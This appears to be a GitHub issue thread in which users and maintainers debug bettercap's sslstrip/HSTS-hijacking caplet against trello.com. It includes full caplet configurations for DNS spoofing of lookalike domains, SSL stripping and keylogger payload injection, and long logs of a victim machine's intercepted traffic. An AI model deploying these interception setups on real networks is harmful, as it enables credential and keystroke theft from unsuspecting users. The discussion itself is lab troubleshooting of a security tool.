192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www-googletagmanager.l.google.com is 216.58.201.168
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : e2286.e2.akamaiedge.net is 23.214.73.99
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : e6653.f.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://www.googletagmanager.com
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://www.google-analytics.com
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://a.trellocdn.com
192.168.1.0/24 > 192.168.1.1  » [21:12:37] [net.sniff.https] sni 192.168.1.35 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://use.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : a-0001.a-msedge.net is 204.79.197.200, 13.107.21.200
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : pagead.l.doubleclick.net is 216.58.210.162
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : js.hs-scripts.com is 104.17.214.204, 104.17.211.204, 104.17.213.204, 104.17.210.204, 104.17.212.204
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : e15071.dscd.akamaiedge.net is 104.103.157.81
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : d1mjjsrsnwnwry.cloudfront.net is 13.33.232.97, 13.33.232.42, 13.33.232.49, 13.33.232.44
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://bat.bing.com
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://www.googleadservices.com
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://js.hs-scripts.com
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://sjs.bizographics.com
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://c.trello.com
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : dart.l.doubleclick.net is 172.217.168.166
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.https] sni 192.168.1.35 > https://5406241.fls.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [21:12:40] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : js.hs-analytics.net is 104.17.67.176, 104.17.69.176, 104.17.70.176, 104.17.71.176, 104.17.68.176
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : chat.cdn.whatsapp.net is 31.13.83.49
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : pagead46.l.doubleclick.net is 172.217.168.162
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.https] sni 192.168.1.35 > https://js.hs-analytics.net
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.https] sni 192.168.1.35 > https://googleads.g.doubleclick.net
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : e6653.dscf.akamaiedge.net is 23.214.213.197
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.https] sni 192.168.1.35 > https://p.typekit.net
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : pagead46.l.doubleclick.net is 172.217.168.162
192.168.1.0/24 > 192.168.1.1  » [21:12:41] [net.sniff.https] sni 192.168.1.35 > https://adservice.google.com
[21:12:42] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : pagead46.l.doubleclick.net is 216.58.201.162
192.168.1.0/24 > 192.168.1.1  » 192.168.1.0/24 > 192.168.1.1  » [21:12:42] [net.sniff.https] sni 192.168.1.35 > https://adservice.google.es
192.168.1.0/24 > 192.168.1.1  » [21:12:42] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : pop-idb2-alpha.mix.linkedin.com is 91.225.248.133
192.168.1.0/24 > 192.168.1.1  » [21:12:42] [net.sniff.https] sni 192.168.1.35 > https://px.ads.linkedin.com
192.168.1.0/24 > 192.168.1.1  » [21:12:42] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : track.hubspot.com is 104.16.252.5, 104.16.250.5, 104.16.249.5, 104.16.253.5, 104.16.251.5
192.168.1.0/24 > 192.168.1.1  » [21:12:42] [net.sniff.https] sni 192.168.1.35 > https://track.hubspot.com
192.168.1.0/24 > 192.168.1.1  » [21:12:43] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : any-na.www.linkedin.com is 108.174.10.10
192.168.1.0/24 > 192.168.1.1  » [21:12:43] [net.sniff.https] sni 192.168.1.35 > https://www.linkedin.com
192.168.1.0/24 > 192.168.1.1  » [21:12:46] [net.sniff.dns] dns 8.8.4.4 > 192.168.1.35 : www.google.com is 172.217.11.132
192.168.1.0/24 > 192.168.1.1  » [21:12:46] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : www.google.com is 64.233.177.106, 64.233.177.104, 64.233.177.105, 64.233.177.147, 64.233.177.99, 64.233.177.103
192.168.1.0/24 > 192.168.1.1  » [21:12:51] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : gstaticadssl.l.google.com is 172.217.16.227
192.168.1.0/24 > 192.168.1.1  » [21:12:51] [net.sniff.https] sni 192.168.1.35 > https://fonts.gstatic.com
192.168.1.0/24 > 192.168.1.1  » [21:12:57] [endpoint.lost] endpoint 192.168.1.33 (MSI-P65.local) 48:a4:72:43:a7:e2 (Intel Corporate) lost.
192.168.1.0/24 > 192.168.1.1  » [21:13:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : api.twitter.com is 104.244.42.66, 104.244.42.2, 104.244.42.194, 104.244.42.130
192.168.1.0/24 > 192.168.1.1  » [21:13:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : mobile.twitter.com is 104.244.42.134, 104.244.42.6, 104.244.42.70, 104.244.42.198
192.168.1.0/24 > 192.168.1.1  » [21:13:16] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : twimg.twitter.map.fastly.net is 151.101.120.159
192.168.1.0/24 > 192.168.1.1  » [21:13:16] [net.sniff.https] sni 192.168.1.35 > https://mobile.twitter.com
[21:13:16] [net.sniff.https] sni 192.168.1.35 > https://api.twitter.com
192.168.1.0/24 > 192.168.1.1  » [21:13:16] [net.sniff.https] sni 192.168.1.35 > https://ton.twimg.com
192.168.1.0/24 > 192.168.1.1  » [21:13:20] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : settings.crashlytics.com is 54.225.218.142, 50.19.107.130, 54.225.200.180, 54.225.185.146, 50.19.252.131, 50.16.247.151, 54.225.219.112, 54.225.238.126
192.168.1.0/24 > 192.168.1.1  » [21:13:20] [net.sniff.https] sni 192.168.1.35 > https://settings.crashlytics.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : api.dropbox-dns.com is 162.125.68.7
[21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropbox.com
192.168.1.0/24 > 192.168.1.1  » 192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : api.dropbox-dns.com is 162.125.68.7
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropboxapi.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropboxapi.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropboxapi.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [21:13:21] [net.sniff.https] sni 192.168.1.35 > https://api.dropboxapi.com
192.168.1.0/24 > 192.168.1.1  » [21:13:22] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : edge-block-previews-video-live.dropbox-dns.com is 162.125.68.5
192.168.1.0/24 > 192.168.1.1  » [21:13:22] [net.sniff.https] sni 192.168.1.35 > https://api-content-photos.dropbox.com
192.168.1.0/24 > 192.168.1.1  » [21:13:23] [net.sniff.dns] dns 8.8.8.8 > 192.168.1.35 : edge-block-api.dropbox-dns.com is 162.125.68.8
192.168.1.0/24 > 192.168.1.1  » [21:13:24] [net.sniff.https] sni 192.168.1.35 > https://api-content.dropbox.com
192.168.1.0/24 > 192.168.1.1  » exit

Exactly what im supposed to access first in order to get 'poisoned': http://trello.com, http://trello.corn, https://trello.com or https://trello.corn?

Regards

@buffermet
Copy link
Member

@JBalanza please provide debug logs and clear trello.com from your HSTS records in chrome://net-internals/#hsts as requested.

@buffermet
Copy link
Member

buffermet commented Mar 18, 2019

Also @JBalanza you need to restart events.stream if you want the requests to be dumped, since it automatically starts when bettercap starts and it therefore does not adopt the changes you made to the events.stream module in the caplet.

You can just pop...

events.stream off
events.stream on

...at the bottom of your caplet.

@evilsocket
Copy link
Member

wow this is probably the longest thread of this repo :D

@buffermet
Copy link
Member

buffermet commented Mar 18, 2019

right? 😆

I want to close but I'm just not sure whether this is a bug or bad config ¯\(ツ)/¯ gotta see those debug logs

@OscarAkaElvis
Copy link
Author

Yeah @evilsocket this is so long... 😢 really is not possible to work in some way like bettercap 1.x ??? I mean, just enable the sslstrip and leave to bettercap the way to handle all the stuff... maybe an "automatic sniffing mode" or something similar... why did you tagged this as bug or refactor? what do you have in mind?

@yungtravla , trello has hsts enabled, that's true... but it has a poor implementation and it is not on browser's internal lists... i repeat, i got this working easily on bettercap 1.x and remember that on each test we clean all the browser cookies, temp files, etc etc... same procedure works on bettercap 1.x and doesn't work on bettercap 2.x ... that's what we are explaining here.

@buffermet
Copy link
Member

@OscarAkaElvis have you tried without airgeddon?

We need to see debug logs. You keep asking for the same implementation as in 1.x but it's already functioning that way, I cannot reproduce a single issue that you and @JBalanza have raised here, and it seems that you are both using bettercap through airgeddon. Try it without airgeddon, try to single out the problem.

Most important of all, please paste debug logs here, not just event logs, debug logs. (add -debug flag)

@JBalanza
Copy link

Here is the debug logs for the same scenario tried a week ago. (The log below were produced using bettercap 2.19 in airgeddon environment).

bettercap v2.19 (built for linux amd64 with go1.10.4) [type 'help' for a list of commands]

[20:44:24] [sys.log] [dbg] FindGateway(wlan0) [cmd=ip opts=[route] parser=^(default|[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\svia\s([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\sdev\s(\S+).*$]
[20:44:24] [sys.log] [dbg] FindGateway(wlan0) output:
default via 10.0.2.2 dev eth0 proto dhcp metric 100 
10.0.2.0/24 dev eth0 proto kernel scope link src 10.0.2.15 metric 100 
172.16.250.0/24 dev wlan0 proto kernel scope link src 172.16.250.1
[20:44:24] [sys.log] [dbg] FindGateway(wlan0): nothing found :/
[20:44:24] [sys.log] [war] Could not detect gateway.
[20:44:24] [session.started] {session.started 2019-03-24 20:44:24.516495424 +0100 CET m=+0.087498193 <nil>}
[20:44:24] [mod.started] events.stream
[20:44:24] [mod.started] net.recon
[20:44:24] [sys.log] [dbg] loading proxy script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js ...
[20:44:24] [sys.log] [inf] [hstshijack] Generating random variable names for this session ...
[20:44:24] [sys.log] [inf] [hstshijack] Reading SSL log ...
[20:44:24] [sys.log] [inf] [hstshijack] No SSL log file found, creating one now ...
[20:44:24] [sys.log] [inf] [hstshijack] Reading caplet ...
[20:44:24] [sys.log] [inf] [hstshijack] Module loaded.

  Commands

    hstshijack.show : Show module info.

  Caplet

               hstshijack.log > /opt/bettercap/ssl.log
           hstshijack.payload > /usr/local/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
            hstshijack.ignore > *
           hstshijack.targets > *.com
      hstshijack.replacements > *.corn
      hstshijack.blockscripts > undefined
         hstshijack.obfuscate > true
            hstshijack.encode > false
    hstshijack.custompayloads > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js
                              > *:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js

  Session info

         Session ID : CorKhhp
      Callback Path : /JEQSAqFA
     Whitelist Path : /bnfgbSIj
       SSL Log Path : /OSqekoVTdOJ
            SSL Log : 1 host

[20:44:24] [sys.log] [dbg] http.proxy proxy script /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js loaded.
[20:44:24] [sys.log] [dbg] http.proxy applied redirection [wlan0] (TCP) :80 -> 172.16.250.1:8200
[20:44:24] [mod.started] http.proxy
[20:44:24] [sys.log] [inf] http.proxy started on 172.16.250.1:8200 (sslstrip enabled)
[20:44:24] [sys.log] [inf] dns.spoof *.corn -> 172.16.250.1
[20:44:24] [mod.started] dns.spoof
[20:44:24] [mod.started] net.sniff
[20:44:24] [mod.stopped] events.stream

The caplet used is this one:

set hstshijack.log             /opt/bettercap/ssl.log
set hstshijack.payload         /usr/local/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
set hstshijack.ignore          *
set hstshijack.targets         *.com
set hstshijack.replacements    *.corn
set hstshijack.obfuscate       true
set hstshijack.encode          false

set hstshijack.custompayloads  *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script     /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
set http.proxy.port       8200
set http.proxy.sslstrip   true
set net.sniff.filter      not (arp or port 5353)
set net.sniff.verbose     false

set dns.spoof.domains     *.corn

http.proxy  on
dns.spoof   on
net.sniff   on
events.stream off
events.stream on

I got an error. When inserting the last two options into the caplet (events.stream off and on), bettercap doen't show any prompt and it is not working.

@JBalanza
Copy link

Hi, long time since our last post...Hope you not missed us very much haha 😄.

I performed the scenario as we talked (without airgeddon): two VM with full visibility between them and one being the spoofer (with bettercap v2.23) acting as a gateway with forwarding enabled and other being the victim. We are going to call them 'spoofer' and 'victim' devices.

I have normal internet access in the victim (through the spoofer) without using bettercap. Then using bettercap, with the following caplet, all starts well. It seems that the domains are spoofed and intercepted succesfully. We find out that trello's login is not working for us (idk if trello's has changed something since last tests). We cannot send the login form due some lack of resources loaded we think.

Of course data, cache and all browser data were cleaned.

this is my caplet

set hstshijack.log             /opt/bettercap/ssl.log
set hstshijack.payload         /usr/local/share/bettercap/caplets/hstshijack/payloads/hstshijack-payload.js
set hstshijack.ignore          *
set hstshijack.targets         *.com, *.es, *.net, *.org
set hstshijack.replacements    *.corn, *.ex, *.met, *.ogr
set hstshijack.obfuscate       true
set hstshijack.encode          false

set hstshijack.custompayloads  *:/usr/local/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/local/share/bettercap/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script     /usr/local/share/bettercap/caplets/hstshijack/hstshijack.js
set http.proxy.port       8200
set http.proxy.sslstrip   true
set net.sniff.filter      not (arp or port 5353)
set net.sniff.verbose     false

set dns.spoof.domains     *.corn, *.ex, *.met, *.ogr

http.proxy  on
dns.spoof   on
net.sniff   on
events.stream off
events.stream on

This is the shown login form (with the error that cannot be sent)

2019-04-22_08h17_34

And the logs are the following:

root@parrot  /home/gmvses/Desktop/bettercap_test  bettercap -iface eth1 -caplet caplet.cap
 bettercap v2.23 (built for linux amd64 with go1.11.6) [type 'help' for a list of commands]

 [08:12:33] [sys.log] [war] Could not find mac for 12.0.0.1
 [08:12:33] [sys.log] [inf] hstshijack Generating random variable names for this session ...
 [08:12:33] [sys.log] [inf] hstshijack Reading SSL log ...
 [08:12:33] [sys.log] [inf] hstshijack Reading caplet ...

	   Commands

	   hstshijack.show : Show module info.

	 Caplet

	hstshijack.log > /opt/bettercap/ssl.log
	hstshijack.ignore > *
	   hstshijack.targets > *.com, *.es, *.net, *.org
	 hstshijack.replacements > *.corn, *.ex, *.met, *.ogr
	   hstshijack.blockscripts > undefined
	hstshijack.obfuscate > true
	hstshijack.encode > false
	hstshijack.payloads > undefined

	  Session info

	   Session ID : iMjisYpUlCcoXjW
	 Callback Path : /aMZKAptHaMKN
	  Whitelist Path : /ZuRyvZNAZveuTibu
	 SSL Log Path : /LYZJprLnPnJzEg
	 SSL Log : 2 hosts

 [08:12:33] [sys.log] [inf] hstshijack Module loaded.
 [08:12:33] [sys.log] [inf] http.proxy started on 12.0.0.4:8200 (sslstrip enabled)
 [08:12:33] [sys.log] [inf] dns.spoof *.ogr -> 12.0.0.4
 [08:12:33] [sys.log] [inf] dns.spoof *.corn -> 12.0.0.4
 [08:12:33] [sys.log] [inf] dns.spoof *.ex -> 12.0.0.4
 [08:12:33] [sys.log] [inf] dns.spoof *.met -> 12.0.0.4
 [08:12:33] [sys.log] [inf] dns.spoof starting net.recon as a requirement for dns.spoof
 [08:12:33] [endpoint.new] endpoint 12.0.0.3 detected as 08:00:27:68:f0:e7 (PCS Computer Systems GmbH).
 [08:12:33] [endpoint.new] endpoint 12.0.0.5 detected as 08:00:27:9d:69:22 (PCS Computer Systems GmbH).
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [war] Could not find mac for 12.0.0.1
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] hstshijack Generating random variable names for this session ...
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] hstshijack Reading SSL log ...
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] hstshijack Reading caplet ...
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] hstshijack Module loaded.
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] http.proxy started on 12.0.0.4:8200 (sslstrip enabled)
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] dns.spoof *.corn -> 12.0.0.4
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] dns.spoof *.ex -> 12.0.0.4
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] dns.spoof *.met -> 12.0.0.4
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] dns.spoof *.ogr -> 12.0.0.4
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [sys.log] [inf] dns.spoof starting net.recon as a requirement for dns.spoof
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [endpoint.new] endpoint 12.0.0.3 detected as 08:00:27:68:f0:e7 (PCS Computer Systems GmbH).
 12.0.0.0/24 > 12.0.0.4  » [08:12:33] [endpoint.new] endpoint 12.0.0.5 detected as 08:00:27:9d:69:22 (PCS Computer Systems GmbH).
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : d3ag4hukkh62yn.cloudfront.net is 54.230.63.7
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : youtube-ui.l.google.com is 2a00:1450:4003:801::200e
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : youtube-ui.l.google.com is 172.217.16.238, 216.58.211.46, 216.58.201.174, 172.217.17.14
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wikipedia.org is 91.198.174.192
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : star-mini.c10r.facebook.com is 31.13.83.36
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : reddit.map.fastly.net is 151.101.1.140, 151.101.65.140, 151.101.129.140, 151.101.193.140
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : star-mini.c10r.facebook.com is 2a03:2880:f104:83:face:b00c:0:25de
 12.0.0.0/24 > 12.0.0.4  » [08:12:37] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : twitter.com is 104.244.42.65, 104.244.42.193
 12.0.0.0/24 > 12.0.0.4  » [08:12:42] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wikipedia.org is 2620:0:862:ed1a::1
 12.0.0.0/24 > 12.0.0.4  » [08:12:42] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wikipedia.org is 91.198.174.192
 12.0.0.0/24 > 12.0.0.4  » [08:12:56] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:56.203344467 +0200 CEST m=+23.187454548 {12.0.0.5 GET trello.com / 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:56] [net.sniff.http.request] http 12.0.0.5 GET trello.com/
 12.0.0.0/24 > 12.0.0.4  » [08:12:56] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : trello.com is 23.78.60.220
 12.0.0.0/24 > 12.0.0.4  » [08:12:56] [sys.log] [inf] [sslstrip] Stripping 7 SSL links from trello.com
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:12:57.045047647 +0200 CEST m=+24.029157779 { GET trello.com / 204251}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.fonts.googleapis.com with fonts.googleapis.com in request from 12.0.0.5:34782
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.271575651 +0200 CEST m=+24.255685867 {12.0.0.5 GET fonts.googleapis.com /css 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.response] http 23.78.60.220:80 200 OK -> 12.0.0.5 (1.4 kB text/html; charset=utf-8)

 HTTP/1.1 200 OK
 Allow-Access-From-Same-Origin: *
 Content-Security-Policy: default-src * 'unsafe-inline' 'unsafe-eval'; script-src * 'unsafe-inline' 'unsafe-eval'; connect-src * 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src *; style-src * 'unsafe-inline';
 Expires: Fri, 20 Apr 2018 04:20:00 GMT
 X-Trello-Version: 1.1614.0
 Access-Control-Allow-Methods: *
 Etag: W/"30a41-co8Hn4sJFFv5s/+TZ3J+r247Qj8"
 Link: <https://trello.corn/cs>; rel="alternate"; hreflang="cs", <https://trello.corn/de>; rel="alternate"; hreflang="de", <https://trello.corn/en>; rel="alternate"; hreflang="en", <https://trello.corn/en-AU>; rel="alternate"; hreflang="en-AU", <https://trello.corn/en-GB>; rel="alternate"; hreflang="en-GB", <https://trello.corn/en-US>; rel="alternate"; hreflang="en-US", <https://trello.corn/es>; rel="alternate"; hreflang="es", <https://trello.corn/fr>; rel="alternate"; hreflang="fr", <https://trello.corn/it>; rel="alternate"; hreflang="it", <https://trello.corn/hu>; rel="alternate"; hreflang="hu", <https://trello.corn/nl>; rel="alternate"; hreflang="nl", <https://trello.corn/nb>; rel="alternate"; hreflang="nb", <https://trello.corn/pl>; rel="alternate"; hreflang="pl", <https://trello.corn/pt-BR>; rel="alternate"; hreflang="pt-BR", <https://trello.corn/fi>; rel="alternate"; hreflang="fi", <https://trello.corn/sv>; rel="alternate"; hreflang="sv", <https://trello.corn/vi>; rel="alternate"; hreflang="vi", <https://trello.corn/tr>; rel="alternate"; hreflang="tr", <https://trello.corn/ru>; rel="alternate"; hreflang="ru", <https://trello.corn/uk>; rel="alternate"; hreflang="uk", <https://trello.corn/th>; rel="alternate"; hreflang="th", <https://trello.corn/zh-Hans>; rel="alternate"; hreflang="zh-Hans", <https://trello.corn/zh-Hant>; rel="alternate"; hreflang="zh-Hant", <https://trello.corn/ja>; rel="alternate"; hreflang="ja", <https://trello.corn>; rel="alternate"; hreflang="x-default", <https://trello.corn>; rel="canonical"
 Referrer-Policy: strict-origin-when-cross-origin
 Access-Control-Allow-Origin: *
 Content-Type: text/html; charset=utf-8
 Content-Type: text/html; charset=utf-8
 Pragma: no-cache
 Set-Cookie: dsc=bb5540734efc2f38ed3adee9b9224c703f89c3324047fcb5ff22ae73959e947d; Path=/; Expires=Thu, 25 Apr 2019 06:12:58 GMT; Secure
 Set-Cookie: lang=en-US; Path=/
 Set-Cookie: mab=91815; Path=/; Expires=Wed, 22 May 2019 06:12:58 GMT
 Vary: Accept-Encoding
 X-Dns-Prefetch-Control: off
 Connection: keep-alive
 Connection: Transfer-Encoding
 Cache-Control: no-cache, no-store, must-revalidate
 Date: Mon, 22 Apr 2019 06:12:58 GMT
 Surrogate-Control: no-store
 X-Trello-Environment: Production
 Access-Control-Allow-Headers: *

 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35358
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:12:57.44187069 +0200 CEST m=+24.425980774 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.fonts.googleapis.com is 216.58.221.74
 12.0.0.0/24 > 12.0.0.4  » 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.fonts.googleapis.com is d83a:dd4a::
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.http.request] http 12.0.0.5 GET wwww.fonts.googleapis.com/css?family=Roboto
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.fonts.googleapis.com is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net.gmv.es is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.fonts.googleapis.com is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 12.0.0.5 > 8.8.8.8 : wwww.fonts.googleapis.com is 216.58.221.74
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 12.0.0.5 > 8.8.8.8 : wwww.fonts.googleapis.com is d83a:dd4a::
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2k1ftgv7pobq7.cloudfront.net is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : wwww.d2t77mnxyo7adj.cloudfront.net.gmv.es is Non-Existent Domain
 12.0.0.0/24 > 12.0.0.4  » [08:12:57] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35356
